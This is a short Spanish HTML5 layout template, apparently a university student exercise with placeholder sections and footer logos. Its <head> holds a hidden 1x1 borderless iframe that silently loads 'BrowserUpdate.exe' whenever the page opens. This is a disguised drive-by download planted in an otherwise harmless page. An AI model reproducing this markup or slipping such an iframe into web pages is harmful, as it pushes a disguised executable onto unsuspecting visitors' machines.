<!DOCTYPE html> <html lang="es"> <!-- PAGINA DE FUENTES: http://www.fontsquirrel.com/ --> <!-- RESPONSIVE DESIGN (diseño sensible a la pantalla) --> <!-- MAQUETADO --> <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe> <title>Estructura Básica Semántica en HTML5 y CSS3</title> <meta charset="utf-8" /> <meta description="DESCRIPCION DE LA PAGINA" content="INICIO" /> <link rel="stylesheet" type="text/css" media="all" href="css/Abril_15.css" /> </head> <body background=Fondo.jpg> <section id="superior"> </section> <section id="inferior"> <section id="izquierda"> <a href="http://www.umich.mx/">UMSNH</a> </section> <section id="centro"> CENTRO </section> <section id="derecha"> DERECHA </section> </section> <footer> <section id="izq"> <a href="http://www.umich.mx/"><img class="fade" src="IMG/UMSNH.png" width=100 height=100></a> </section> <section id="cen"><img class="fade" src="IMG/golpes.gif" width=100 height=100></section> <section id="der"> <a href="www.fie.umich.mx"><img class="fade" src="IMG/fie.gif" width=100 height=100></a> </section> <center>Abril 15 del 2016</center> </footer> </body> </html>